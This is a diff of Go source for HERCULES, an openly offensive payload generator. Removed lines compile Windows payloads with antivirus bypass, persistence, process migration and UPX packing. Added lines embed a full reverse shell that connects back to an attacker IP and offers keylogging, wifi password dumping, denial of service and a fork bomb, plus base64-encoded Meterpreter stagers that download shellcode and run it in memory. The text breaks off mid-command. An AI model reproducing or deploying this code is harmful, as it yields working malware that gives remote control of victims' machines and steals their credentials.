strings.TrimSuffix(Payload.FileName, ".go") - if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) { - Warning.Println("\n[!] ERROR : Compile failed") - os.Exit(1) - } - File.Close() - MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME") - exec.Command("sh", "-c", MovePayload).Run() - - - - - }else if Payload.Type == 1 { - var IP string = "[4]byte{" - IP_Array := strings.Split(string(Payload.Ip), `.`) - for i := 0; i < 4; i++ { - if i == 3 { - IP += (IP_Array[i] + ",") - break - } - IP += (IP_Array[i] + "," + " ") - } - IP += "}}" - - SourceCode = strings.Replace(string(Source), `[4]byte{127,0,0,1}}`, IP, -1) - SourceCode = strings.Replace(string(SourceCode), `5555`, Payload.Port, -1) - if Payload.BypassAV == true { - SourceCode = strings.Replace(string(SourceCode), "//import \"EGESPLOIT/RSE\"", "import \"EGESPLOIT/RSE\"", -1) - SourceCode = strings.Replace(string(SourceCode), "//RSE.BypassAV(3)", "RSE.BypassAV(3)", -1) - } - - if Payload.Persistence == true { - SourceCode = strings.Replace(string(SourceCode), `//import "EGESPLOIT/RSE"`, `import "EGESPLOIT/RSE"`, -1) - SourceCode = strings.Replace(string(SourceCode), `//RSE.Persistence()`, `RSE.Persistence()`, -1) - } - if Payload.Migrate == true { - SourceCode = strings.Replace(string(SourceCode), `//import "EGESPLOIT/RSE"`, `import "EGESPLOIT/RSE"`, -1) - SourceCode = strings.Replace(string(SourceCode), `//RSE.Migrate(Addr, int(Length_int))`, `RSE.Migrate(Addr, int(Length_int))`, -1) - } - - - File.WriteString(SourceCode) - - BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName) - BoldYellow.Println("\n[*] Compiling payload...") - BoldYellow.Println("\n[*] " + BuildCommand_Args) - BuildCommand := exec.Command("sh", "-c", BuildCommand_Args) - BuildCommand.Stdout = os.Stdout - BuildCommand.Stderr = os.Stderr - BuildCommand.Run() - CleanFilesCommand := string("rm " + Payload.FileName) - exec.Command("sh", "-c", CleanFilesCommand).Run() - DirFiles, _ := exec.Command("sh", "-c", "ls").Output() - FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go") - if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) { - Warning.Println("\n[!] ERROR : Compile failed") - os.Exit(1) - } - File.Close() - MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME") - exec.Command("sh", "-c", MovePayload).Run() - - }else if Payload.Type == 4 { - Payload.Ip = string(`"`+Payload.Ip+`"`) - Payload.Port = string(`"`+Payload.Port+`"`) - SourceCode = strings.Replace(string(Source), `"10.10.10.84"`, Payload.Ip, -1) - SourceCode = strings.Replace(string(SourceCode), `"5555"`, Payload.Port, -1) - - File.WriteString(SourceCode) - - BuildCommand_Args := string(`export GOOS=windows && export GOARCH=386 && export GOPATH=$HERCULES_PATH && go build -ldflags "-H windowsgui -s -w" ` + Payload.FileName) - BoldYellow.Println("\n[*] Compiling payload...") - BoldYellow.Println("\n[*] " + BuildCommand_Args) - BuildCommand := exec.Command("sh", "-c", BuildCommand_Args) - BuildCommand.Stdout = os.Stdout - BuildCommand.Stderr = os.Stderr - BuildCommand.Run() - CleanFilesCommand := string("rm " + Payload.FileName) - exec.Command("sh", "-c", CleanFilesCommand).Run() - DirFiles, _ := exec.Command("sh", "-c", "ls").Output() - FileName_No_Suffix := strings.TrimSuffix(Payload.FileName, ".go") - if !(strings.Contains(string(DirFiles), FileName_No_Suffix)) { - Warning.Println("\n[!] ERROR : Compile failed") - os.Exit(1) - } - File.Close() - MovePayload := string("mv " + FileName_No_Suffix + ".exe $HOME") - exec.Command("sh", "-c", MovePayload).Run() - - } - -} - -func AskMigrate() { - Red := color.New(color.FgRed) - Warning := Red.Add(color.Bold) - Yellow := color.New(color.FgYellow) - BoldYellow := Yellow.Add(color.Bold) - BoldYellow.Print("\n[?] ") - fmt.Print("Do you want to add migration function to payload (y/n) :") - fmt.Scan(&Ask) - if Ask == "y" || Ask == "Y" { - Warning.Print("\n[!] Adding migration will decreases the AV Evasion Score and increase the paylaod size, do you still want to continue (Y/n) :") - fmt.Scan(&Ask) - if Ask == "y" || Ask == "Y"{ - Payload.Migrate = true - Payload.Score = (Payload.Score - 1) - }else{ - Payload.Migrate = false - } - }else{ - Payload.Migrate = false - } -} - - - - -func AskPersistence() { - Red := color.New(color.FgRed) - Warning := Red.Add(color.Bold) - Yellow := color.New(color.FgYellow) - BoldYellow := Yellow.Add(color.Bold) - BoldYellow.Print("\n[?] ") - fmt.Print("Do you want to add persistence function to payload (y/n) :") - fmt.Scan(&Ask) - if Ask == "y" || Ask == "Y" { - Warning.Print("\n[!] Adding persistence will decreases the AV Evasion Score and increase the paylaod size, do you still want to continue (Y/n) :") - fmt.Scan(&Ask) - if Ask == "y" || Ask == "Y"{ - Payload.Persistence = true - Payload.Score = (Payload.Score - 2) - }else{ - Payload.Persistence = false - } - }else{ - Payload.Persistence = false - } -} - -func AskBypassAV() { - Red := color.New(color.FgRed) - Warning := Red.Add(color.Bold) - Yellow := color.New(color.FgYellow) - BoldYellow := Yellow.Add(color.Bold) - BoldYellow.Print("\n[?] ") - fmt.Print("Do you want to add Bypass AV function to payload (y/n) :") - fmt.Scan(&Ask) - if Ask == "y" || Ask == "Y" { - Warning.Print("\n[!] Adding Bypass AV will increase the paylaod size, do you still want to continue (Y/n) :") - fmt.Scan(&Ask) - if Ask == "y" || Ask == "Y"{ - Payload.BypassAV = true - Payload.Score = (Payload.Score + 2) - }else{ - Payload.BypassAV = false - } - }else{ - Payload.BypassAV = false - } -} - - - - -func AskUPX() { - Red := color.New(color.FgRed) - Warning := Red.Add(color.Bold) - Yellow := color.New(color.FgYellow) - BoldYellow := Yellow.Add(color.Bold) - BoldYellow.Print("\n[?] ") - fmt.Print("Do you want to compress the payload with UPX (y/n) :") - fmt.Scan(&Ask) - if Ask == "y" || Ask == "Y" { - Warning.Print("\n[!] Compressing payloads with UPX decreases the AV Evasion Score, do you still want to continue (Y/n) :") - fmt.Scan(&Ask) - if Ask == "y" || Ask == "Y"{ - Payload.UPX = true - Payload.Score = (Payload.Score - 3) - ClearScreen() - PrintBanner() - - ExeName := strings.TrimSuffix(Payload.FileName, ".go") - ExeName += ".exe" - UPX_Command := string("upx --brute " + ExeName) - UPX := exec.Command("sh", "-c", UPX_Command) - UPX.Stdout = os.Stdout - UPX.Run() - }else{ - Payload.UPX = false - } - }else{ - Payload.UPX = false - } -} - - -func ClearScreen() { - Clear := exec.Command("clear") - Clear.Stdout = os.Stdout - Clear.Run() -} - - - - - - - -func PreparePayload(No int) { - - Blue := color.New(color.FgBlue) - BoldBlue := Blue.Add(color.Bold) - Green := color.New(color.FgGreen) - BoldGreen := Green.Add(color.Bold) - Red := color.New(color.FgRed) - Warning := Red.Add(color.Bold) - - - if No == 1 { - Payload.Type = 1 - Payload.Size = "946 KB" - Payload.FullSize = "1.1 MB" - Payload.MidSize = "326 KB" - Payload.UPX_Size = "262 KB" - Payload.Score = 8 - Payload.SourceCode = METERPRETER_TCP - - ClearScreen() - PrintBanner() - - BoldBlue.Println("#====================================================================================#") - BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") - BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") - BoldBlue.Print("# Meterpreter Reverse TCP | 946 KB / 262 KB | ") - BoldGreen.Print(" 8/10 ") - BoldBlue.Println("#") - BoldBlue.Println("#====================================================================================#") - - for ;; { - var IP string - fmt.Print("\n\n[*] Enter LHOST : ") - fmt.Scan(&IP) - if (len(IP) < 7) || (len(IP) > 15) { - Warning.Println("\n\n[!] ERROR : Invalid ip") - }else{ - Payload.Ip = IP - break - } - - } - - for ;; { - var PORT string - fmt.Print("\n[*] Enter LPORT : ") - fmt.Scan(&PORT) - _, err := strconv.Atoi(PORT) - if err == nil { - Payload.Port = PORT - break - } - Warning.Println("\n\n[!] ERROR : Invalid port") - - } - AskPersistence() - AskMigrate() - AskBypassAV() - - - }else if No == 2 { - - Payload.Type = 2 - Payload.Size = "4.2 MB" - Payload.UPX_Size = "1.1 KB" - Payload.Score = 8 - Payload.SourceCode = METERPRETER_HTTP_HTTPS - - ClearScreen() - PrintBanner() - - BoldBlue.Println("#====================================================================================#") - BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") - BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") - BoldBlue.Print("# Meterpreter Reverse HTTP | 4.2 MB / 1.1 MB | ") - BoldGreen.Print(" 8/10 ") - BoldBlue.Println("#") - BoldBlue.Println("#====================================================================================#") - - for ;; { - var IP string - fmt.Print("\n\n[*] Enter LHOST : ") - fmt.Scan(&IP) - if (len(IP) < 7) || (len(IP) > 15) { - Warning.Println("\n\n[!] ERROR : Invalid ip") - }else{ - Payload.Ip = IP - break - } - - } - - for ;; { - var PORT string - fmt.Print("\n[*] Enter LPORT : ") - fmt.Scan(&PORT) - _, err := strconv.Atoi(PORT) - if err == nil { - Payload.Port = PORT - break - } - Warning.Println("\n\n[!] ERROR : Invalid port") - - } - - - AskPersistence() - AskMigrate() - - - }else if No == 3 { - Payload.Type = 3 - Payload.Size = "4.2 MB" - Payload.Score = 8 - Payload.SourceCode = METERPRETER_HTTP_HTTPS - - ClearScreen() - PrintBanner() - - BoldBlue.Println("#====================================================================================#") - BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") - BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") - BoldBlue.Print("# Meterpreter Reverse HTTPS | 4.2 MB / 1.1 MB | ") - BoldGreen.Print(" 8/10 ") - BoldBlue.Println("#") - BoldBlue.Println("#====================================================================================#") - - for ;; { - var IP string - fmt.Print("\n\n[*] Enter LHOST : ") - fmt.Scan(&IP) - if (len(IP) < 7) || (len(IP) > 15) { - Warning.Println("\n\n[!] ERROR : Invalid ip") - }else{ - Payload.Ip = IP - break - } - - } - - for ;; { - var PORT string - fmt.Print("\n[*] Enter LPORT : ") - fmt.Scan(&PORT) - _, err := strconv.Atoi(PORT) - if err == nil { - Payload.Port = PORT - break - } - Warning.Println("\n\n[!] ERROR : Invalid port") - - } - - AskPersistence() - AskMigrate() - - - - }else if No == 4 { - Payload.Type = 4 - Payload.Size = "4.4 MB" - Payload.Score = 9 - Payload.SourceCode = HERCULES_REVERSE_SHELL - - ClearScreen() - PrintBanner() - - BoldBlue.Println("#====================================================================================#") - BoldBlue.Println("# SELECTED PAYLOAD | SIZE/UPX | AV Evasion Score #") - BoldBlue.Println("#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~#") - BoldBlue.Print("# HERCULES REVERSE SHELL | 4.4 MB / 1.1 MB | ") - BoldGreen.Print("7/10 ") - BoldBlue.Println("#") - BoldBlue.Println("#====================================================================================#") - - for ;; { - var IP string - fmt.Print("\n\n[*] Enter LHOST : ") - fmt.Scan(&IP) - if (len(IP) < 7) || (len(IP) > 15) { - Warning.Println("\n\n[!] ERROR : Invalid ip") - }else{ - Payload.Ip = IP - break - } - - } - - for ;; { - var PORT string - fmt.Print("\n[*] Enter LPORT : ") - fmt.Scan(&PORT) - _, err := strconv.Atoi(PORT) - if err == nil { - Payload.Port = PORT - break - } - Warning.Println("\n\n[!] ERROR : Invalid port") - - } - - - - }else { - - ClearScreen() - PrintBanner() - PrintPayloads() - - Warning.Println("\n[!] ERROR : Invalid choise\n") - - fmt.Print("\n\n[*] Select : ") - fmt.Scan(&NO) - - PreparePayload(NO) - - } - -} +package main + +import "strings" +import "fmt" +import "os" +import "time" +import "strconv" +import "net/http" +import "io/ioutil" +import "os/exec" +import "encoding/base64" +import "github.com/fatih/color" + +const VERSION string = "3.0.5" + +var HERCULES_REVERSE_SHELL string = "package main

import "net"
import "os/exec"
import "bufio"
import "strings"
import "syscall"
import "time"
import "EGESPLOIT"



const IP string = "10.10.10.84"
const PORT string = "5555"

const BACKDOOR bool = false;
const EMBEDDED bool = false;
const TIME_DELAY time.Duration = 5;//Second

const B64_BINARY string = "//INSERT-BINARY-HERE//"
const BINARY_NAME string = "winupdt.exe"

var GLOBAL_COMMAND string;
var PARAMETERS string;
var KeyLogs string;



func main() {


  if EMBEDDED == true {
    EGESPLOIT.Dispatch(B64_BINARY, BINARY_NAME, PARAMETERS)
  }


  if BACKDOOR == true {
    EGESPLOIT.Persistence()
  }

  connect, err := net.Dial("tcp", IP+":"+PORT);
  if err != nil {
    time.Sleep(TIME_DELAY*time.Second);
    main();
  };



  Dir, Version, Username, AV := EGESPLOIT.Sysguide()
  SysGuide := (BANNER + "# SYSGUIDE\n" + "|" + string(Version) + "|\n|\n~> User : " + string(Username) + "\n|\n|\n~> AV : " + string(AV)  + "\n\n\n" + string(Dir) + ">")
  connect.Write([]byte(string(SysGuide)));



  for {

    Command, _ := bufio.NewReader(connect).ReadString('\n');
    _Command := string(Command);
    GLOBAL_COMMAND = _Command;



    if strings.Contains(_Command, "~please") || strings.Contains(_Command, "~PLEASE") {
      connect.Write([]byte(EGESPLOIT.Please(GLOBAL_COMMAND)));
    }else if strings.Contains(_Command, "~METERPRETER") || strings.Contains(_Command, "~meterpreter") {
      Temp_Address := strings.Split(_Command, "\"")//~meterpreter --tcp "127.0.0.1:4444"
      Address := string(Temp_Address[1])
      ConType := strings.Split(_Command, " ")
      ConType[1] = strings.TrimPrefix(ConType[1], "--")
      EGESPLOIT.Meterpreter(ConType[1], Address)
      connect.Write([]byte("\n\n[+] Meterpreter Executed !\n\n"+Dir+">"));
    }else if strings.Contains(_Command, "~MIGRATE") || strings.Contains(_Command, "~migrate") {
      Temp_Address := strings.Split(_Command, "\"")//~migrate "127.0.0.1:4444" 1212
      Address := string(Temp_Address[1])
      Pid := strings.Split(_Command, " ")
      Result, Error := EGESPLOIT.Migrate(Pid[2], Address)
      if Result == true {
          connect.Write([]byte("\n\n[+] Succesfully Migrated !\n\n"+Dir+">"));
      }else{
        connect.Write([]byte("\n\n"+Error+"\n\n"+Dir+">"));
      }
    }else if strings.Contains(_Command, "~DOS") || strings.Contains(_Command, "~dos") {
      DOS_Command := strings.Split(GLOBAL_COMMAND, "\"")
      var DOS_Target string =  DOS_Command[1]
      if strings.Contains(string(DOS_Target), "http") {
        go EGESPLOIT.Dos(DOS_Target);
        connect.Write([]byte("\n\n[*] Starting DOS atack..."+"\n\n[*] Sending 1000 request to "+DOS_Target+" !\n\n"+Dir+">"));
      }else{
        connect.Write([]byte("\n\n[-] ERROR: Invalid url !\n\n"+Dir+">"));
      }
    }else if strings.Contains(_Command, "~DISTRACT") || strings.Contains(_Command, "~distract") {
      EGESPLOIT.Distrackt();
    }else if strings.Contains(_Command, "~KEYLOGGER-DEPLOY") || strings.Contains(_Command, "~keylogger-deploy") || strings.Contains(_Command, "~Keylogger-Deploy"){
      go EGESPLOIT.Keylogger(&KeyLogs);
       connect.Write([]byte(string("\n[*] Keylogger deploy completed\n" + "\n" + string(Dir) + ">")));
    }else if strings.Contains(_Command, "~KEYLOGGER-DUMP") || strings.Contains(_Command, "~keylogger-dump") || strings.Contains(_Command, "~Keylogger-Dump"){
      Dump_Output := string("################## KEYLOGGER DUMP ##################" + "\n\n" + string(KeyLogs) + "\n####################################################" + "\n"+string(Dir)+">");
      connect.Write([]byte(Dump_Output));
    }else if strings.Contains(_Command, "~WIFI-LIST") || strings.Contains(_Command, "~wifi-list") {
      List := EGESPLOIT.WifiList();
      connect.Write([]byte(string(List)));
    }else if strings.Contains(_Command, "~HELP") || strings.Contains(_Command, "~help") {
      connect.Write([]byte(string(HELP+Dir+">")));
    }else if strings.Contains(_Command, "~PERSISTENCE") || strings.Contains(_Command, "~persistence") {
      go EGESPLOIT.Persistence();
      connect.Write([]byte("\n\n[*] Adding persistence registries...\n[*] Persistence Completed\n\n" + string(Dir) +">"));
    }else{
      cmd := exec.Command("cmd", "/C", _Command);
      cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true};
      out, _ := cmd.Output();
      Command_Output := string("\n\n"+string(out)+"\n"+string(Dir)+">");
      connect.Write([]byte(Command_Output));
    };
  };
};






var BANNER string = `
                  __  ____________  ________  ____    ___________
                 / / / / ____/ __ \/ ____/ / / / /   / ____/ ___/
                / /_/ / __/ / /_/ / /   / / / / /   / __/  \__ \
               / __  / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ /
              /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/


############################ HERCULES REVERSE SHELL ############################
`




var HELP string = `

                  __  ____________  ________  ____    ___________
                 / / / / ____/ __ \/ ____/ / / / /   / ____/ ___/
                / /_/ / __/ / /_/ / /   / / / / /   / __/  \__ \
               / __  / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ /
              /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/


############################ HERCULES REVERSE SHELL ##########################################



~PERSSISTENCE                         Installs a persistence module for continious acces

~DISTRACT                             Executes a fork bomb bat file for distraction

~PLEASE                               Asks users comfirmation for higher privilidge operations

~DOS -A "www.targetsite.com"          Starts a denial of service atack

~WIFI-LIST 						                Dumps all wifi history data with passwords

~METERPRETER --http "10.0.0.1:4444"   Creates a meterpreter connection to metasploit (http/https/tcp)

~KEYLOGGER-DEPLOY                     Installs a keylogger module and logs all keystrokes

~KEYLOGGER-DUMP                       Dumps all loged keystrokes

~MIGRATE "10.0.0.1:4444" 2222         Creates a reverse http meterpreter session at given pid (EXPERIMENTAL)


###############################################################################################

`
" +var METERPRETER_TCP string = "cGFja2FnZSBtYWluCgoKaW1wb3J0ICJlbmNvZGluZy9iaW5hcnkiCmltcG9ydCAic3lzY2FsbCIKaW1wb3J0ICJ1bnNhZmUiCi8vaW1wb3J0ICJFR0VTUExPSVQvUlNFIgoKY29uc3QgTUVNX0NPTU1JVCAgPSAweDEwMDAKY29uc3QgTUVNX1JFU0VSVkUgPSAweDIwMDAKY29uc3QgUEFHRV9BbGxvY2F0ZVVURV9SRUFEV1JJVEUgID0gMHg0MAoKCnZhciBLMzIgPSBzeXNjYWxsLk5ld0xhenlETEwoImtlcm5lbDMyLmRsbCIpCnZhciBWaXJ0dWFsQWxsb2MgPSBLMzIuTmV3UHJvYygiVmlydHVhbEFsbG9jIikKCgpmdW5jIEFsbG9jYXRlKFNoZWxsY29kZSB1aW50cHRyKSAodWludHB0cikgewoKCUFkZHIsIF8sIF8gOj0gVmlydHVhbEFsbG9jLkNhbGwoMCwgU2hlbGxjb2RlLCBNRU1fUkVTRVJWRXxNRU1fQ09NTUlULCBQQUdFX0FsbG9jYXRlVVRFX1JFQURXUklURSkKCWlmIEFkZHIgPT0gMCB7CgkJbWFpbigpCgl9CglyZXR1cm4gQWRkcgp9CgpmdW5jIG1haW4oKSB7CgkvL1JTRS5QZXJzaXN0ZW5jZSgpCgl2YXIgV1NBX0RhdGEgc3lzY2FsbC5XU0FEYXRhCglzeXNjYWxsLldTQVN0YXJ0dXAodWludDMyKDB4MjAyKSwgJldTQV9EYXRhKQoJU29ja2V0LCBfIDo9IHN5c2NhbGwuU29ja2V0KHN5c2NhbGwuQUZfSU5FVCwgc3lzY2FsbC5TT0NLX1NUUkVBTSwgMCkKCVNvY2tldF9BZGRyIDo9IHN5c2NhbGwuU29ja2FkZHJJbmV0NHtQb3J0OiA1NTU1LCBBZGRyOiBbNF1ieXRlezEyNywwLDAsMX19CglzeXNjYWxsLkNvbm5lY3QoU29ja2V0LCAmU29ja2V0X0FkZHIpCgl2YXIgTGVuZ3RoIFs0XWJ5dGUKCVdTQV9CdWZmZXIgOj0gc3lzY2FsbC5XU0FCdWZ7TGVuOiB1aW50MzIoNCksIEJ1ZjogJkxlbmd0aFswXX0KCVVpdG5aZXJvXzEgOj0gdWludDMyKDApCglEYXRhUmVjZWl2ZWQgOj0gdWludDMyKDApCglzeXNjYWxsLldTQVJlY3YoU29ja2V0LCAmV1NBX0J1ZmZlciwgMSwgJkRhdGFSZWNlaXZlZCwgJlVpdG5aZXJvXzEsIG5pbCwgbmlsKQoJTGVuZ3RoX2ludCA6PSBiaW5hcnkuTGl0dGxlRW5kaWFuLlVpbnQzMihMZW5ndGhbOl0pCglpZiBMZW5ndGhfaW50IDwgMTAwIHsKCQltYWluKCkKCX0KCVNoZWxsY29kZV9CdWZmZXIgOj0gbWFrZShbXWJ5dGUsIExlbmd0aF9pbnQpCgoJdmFyIFNoZWxsY29kZSBbXWJ5dGUKCVdTQV9CdWZmZXIgPSBzeXNjYWxsLldTQUJ1ZntMZW46IExlbmd0aF9pbnQsIEJ1ZjogJlNoZWxsY29kZV9CdWZmZXJbMF19CglVaXRuWmVyb18xID0gdWludDMyKDApCglEYXRhUmVjZWl2ZWQgPSB1aW50MzIoMCkKCVRvdGFsRGF0YVJlY2VpdmVkIDo9IHVpbnQzMigwKQoJZm9yIFRvdGFsRGF0YVJlY2VpdmVkIDwgTGVuZ3RoX2ludCB7CgkJc3lzY2FsbC5XU0FSZWN2KFNvY2tldCwgJldTQV9CdWZmZXIsIDEsICZEYXRhUmVjZWl2ZWQsICZVaXRuWmVyb18xLCBuaWwsIG5pbCkKCQlmb3IgaSA6PSAwOyBpIDwgaW50KERhdGFSZWNlaXZlZCk7IGkrKyB7CgkJCVNoZWxsY29kZSA9IGFwcGVuZChTaGVsbGNvZGUsIFNoZWxsY29kZV9CdWZmZXJbaV0pCgkJfQoJCVRvdGFsRGF0YVJlY2VpdmVkICs9IERhdGFSZWNlaXZlZAoJfQoKCUFkZHIgOj0gQWxsb2NhdGUodWludHB0cihMZW5ndGhfaW50ICsgNSkpCglBZGRyUHRyIDo9ICgqWzk5MDAwMF1ieXRlKSh1bnNhZmUuUG9pbnRlcihBZGRyKSkKCVNvY2tldFB0ciA6PSAodWludHB0cikodW5zYWZlLlBvaW50ZXIoU29ja2V0KSkKCUFkZHJQdHJbMF0gPSAweEJGCglBZGRyUHRyWzFdID0gYnl0ZShTb2NrZXRQdHIpCglBZGRyUHRyWzJdID0gMHgwMAoJQWRkclB0clszXSA9IDB4MDAKCUFkZHJQdHJbNF0gPSAweDAwCglmb3IgQnB1QUtySnhmbCwgSUluZ2FjTWFCaCA6PSByYW5nZSBTaGVsbGNvZGUgewoJCUFkZHJQdHJbQnB1QUtySnhmbCs1XSA9IElJbmdhY01hQmgKCX0KCS8vUlNFLk1pZ3JhdGUoQWRkciwgaW50KExlbmd0aF9pbnQpKQoJc3lzY2FsbC5TeXNjYWxsKEFkZHIsIDAsIDAsIDAsIDApCn0KCi8qCgoxLiBDcmVhdGUgV1NBIERBVEEgdmVyc2lvbiAyLjIKMi4gQ3JlYXRlIGEgV1NBIFNvY2tldAozLiBDcmVhdGUgV1NBIFNvY2tldCBBZGRyZXNzIG9iamVjdAo0LiBDb25uZWN0CjUuIENyZWF0ZSA0IGJ5dGUgc2Vjb25kIHN0YWdlIGxlbmd0aCBhcnJheQo2LiBDcmVhdGUgYSBXU0EgQnVmZmVyIG9iamVjdCBwb2ludGluZyBzZWNvbmQgc3RhZ2UgbGVuZ3RoIGFycmF5CjcuIFJlY2VpdmUgNCBieXRlcyBXU0FSZWN2IHRvIHNlY29uZCBzdGFnZSBsZW5ndGggYXJyYXkKOC4gQ29udmVydCBzZWNvbmQgc3RhZ2UgbGVuZ3RoIHRvIGludAo5LiBDcmVhdGUgYSBieXRlIGFycmF5IGF0IHRoZSBzaXplIG9mIHNlY29uZCBzdGFnZSBieXRlIGFycmF5IGZvciBzZWNvbmQgc3RhZ2Ugc2hlbGxjb2RlCjEwLiBDcmVhdGUgYSB1bmRlZmluZWQgYnl0ZSBhcnJheQoxMS4gQ3JlYXRlIGFub3RoZXIgV1NBIGJ1ZmZlciBvYmplY3QgcG9pbnRpbmcgYXQgc2Vjb25kIHN0YWdlIHNoZWxsY29kZSBieXRlIGFycmF5CjEyLiBDb25zdHJ1Y3QgYSBuZXN0ZWQgZm9yIGxvb3AgdGhhdCByZWNlaXZlcyBieXRlcyBhbmQgYXBwZW5kcyB0aGVtIGludG8gdW5kZWZpbmVkIGJ5dGUgYXJyYXkKMTMuIEFsbG9jYXRlIHNwYWNlIGluIG1lbW9yeSBhdCB0aGUgc2l6ZSBvZiAoc2Vjb25kIHN0YWdlIHNoZWxsY29kZSArIDUpCjE0LiBDcmVhdGUgYSBwb2ludGVyIHRoYXQgcG9pbnRzIHRvIFdTQSBTb2NrZXQKMTUuIEFzc2luZyAweEJGKG1vdiBlZGkpIHRvIGZpc3QgYnl0ZSBvZiBhbGxvY2F0ZWQgbWVtb3J5CjE2LiBBc3NpbmcgV1NBIFNvY2tldCBwb2ludGVyIHRvIHNlY29uZCBieXRlIG9mIGFsbG9jYXRlZCBtZW1vcnkKMTcuIEFzc2luZyB0cmVlIG51bGwgYnl0ZXMgYWZ0ZXIgc2Vjb25kIGJ5dGUgb2YgYWxsb2NhdGVkIG1lbW9yeQoxOC4gTW92ZSBzaGVsbGNvZGUgYnl0ZXMgdG8gYWxsb2NhdGVkIG1lbW9yeSBzdGFydGluZyBhdCBmaWZ0IGJ5dGUKMTkuIE1ha2UgYSBzeXNjYWxsIHRvIGFsbG9jYXRlZCBtZW1vcnkgYWRkcmVzcwoqLwo=" +var METERPRETER_HTTP_HTTPS string = "cGFja2FnZSBtYWluCgppbXBvcnQgIm5ldC9odHRwIgppbXBvcnQgInN5c2NhbGwiCmltcG9ydCAidW5zYWZlIgppbXBvcnQgImlvL2lvdXRpbCIKLy9pbXBvcnQgIkVHRVNQTE9JVC9SU0UiCgoKCmNvbnN0IE1FTV9DT01NSVQgID0gMHgxMDAwCmNvbnN0IE1FTV9SRVNFUlZFID0gMHgyMDAwCmNvbnN0IFBBR0VfQWxsb2NhdGVVVEVfUkVBRFdSSVRFICA9IDB4NDAKCnZhciBLMzIgPSBzeXNjYWxsLk5ld0xhenlETEwoImtlcm5lbDMyLmRsbCIpCnZhciBWaXJ0dWFsQWxsb2MgPSBLMzIuTmV3UHJvYygiVmlydHVhbEFsbG9jIikKdmFyIEFkZHJlc3Mgc3RyaW5nID0gImh0dHA6Ly8xMjcuMC4wLjE6ODA4MC8iCnZhciBDaGVja3N1bSBzdHJpbmcgPSAiMTAyMDExYjd0eHBsNzFuIgoKCgpmdW5jIG1haW4oKSB7CiAgLy9SU0UuUGVyc2lzdGVuY2UoKQogIEFkZHJlc3MgKz0gQ2hlY2tzdW0KICBSZXNwb25zZSwgZXJyIDo9IGh0dHAuR2V0KEFkZHJlc3MpCiAgaWYgZXJyICE9IG5pbCB7CiAgICBtYWluKCkKICB9CiAgU2hlbGxjb2RlLCBfIDo9IGlvdXRpbC5SZWFkQWxsKFJlc3BvbnNlLkJvZHkpCgogIEFkZHIsIF8sIGVyciA6PSBWaXJ0dWFsQWxsb2MuQ2FsbCgwLCB1aW50cHRyKGxlbihTaGVsbGNvZGUpKSwgTUVNX1JFU0VSVkV8TUVNX0NPTU1JVCwgUEFHRV9BbGxvY2F0ZVVURV9SRUFEV1JJVEUpCiAgaWYgQWRkciA9PSAwIHsKICAgIG1haW4oKQogIH0KICBBZGRyUHRyIDo9ICgqWzk5MDAwMF1ieXRlKSh1bnNhZmUuUG9pbnRlcihBZGRyKSkKICBmb3IgaSA6PSAwOyBpIDwgbGVuKFNoZWxsY29kZSk7IGkrKyB7CiAgICBBZGRyUHRyW2ldID0gU2hlbGxjb2RlW2ldCiAgfQogIC8vUlNFLk1pZ3JhdGUoQWRkciwgbGVuKFNoZWxsY29kZSkpCiAgc3lzY2FsbC5TeXNjYWxsKEFkZHIsIDAsIDAsIDAsIDApCgp9Cg==" + +type PAYLOAD struct { + Ip string + Port string + Type int + Size string + UPX_Size string + MidSize string + FullSize string + Score float32 + FileName string + SourceCode string + Persistence bool + Migrate bool + BypassAV bool + UPX bool +} + +var Payload PAYLOAD +var MenuSelection int +var Ask string +var NO int + +func main() { + + Green := color.New(color.FgGreen) + BoldGreen := Green.Add(color.Bold) + Yellow := color.New(color.FgYellow) + BoldYellow := Yellow.Add(color.Bold) + Red := color.New(color.FgRed) + BoldRed := Red.Add(color.Bold) + + Result := CheckSetup() + + if Result == false { + ClearScreen() + PrintBanner() + PrintCredit() + + BoldRed.Println("\n\n[!] HERCULES is not installed properly, please run setup.sh") + + os.Exit(1) + + } + + ClearScreen() + PrintBanner() + PrintCredit() + Menu_1() + + fmt.Scan(&MenuSelection) + + ClearScreen() + + if MenuSelection == 1 { + PrintBanner() + PrintPayloads() + fmt.Print("\n\n[*] Select : ") + fmt.Scan(&NO) + PreparePayload(NO) + + fmt.Print("\n\n[*] Enter the base name for output files : ") + fmt.Scan(&Payload.FileName) + CompilePayload() + AskUPX() + FinalView() + } else if MenuSelection == 2 { + ClearScreen() + PrintBanner() + PrintCredit() + BoldRed.Println("\n\n[!] Bind payload option will be added at next version...") + time.Sleep(3 * time.Second) + main() + } else if MenuSelection == 3 { + ClearScreen() + PrintBanner() + PrintCredit() + fmt.Println("\n\n") + Result := ChecVersion() + if strings.Contains(Result, "[!]") { + BoldRed.Println(Result) + if Result == "[!] New version detected" { + BoldYellow.Print("\nDo you want to upgrade ? (y/n) : ") + fmt.Scan(&Ask) + if Ask == "y" || Ask == "Y" { + Update := exec.Command("sh", "-c", "chmod 777 Update && sudo 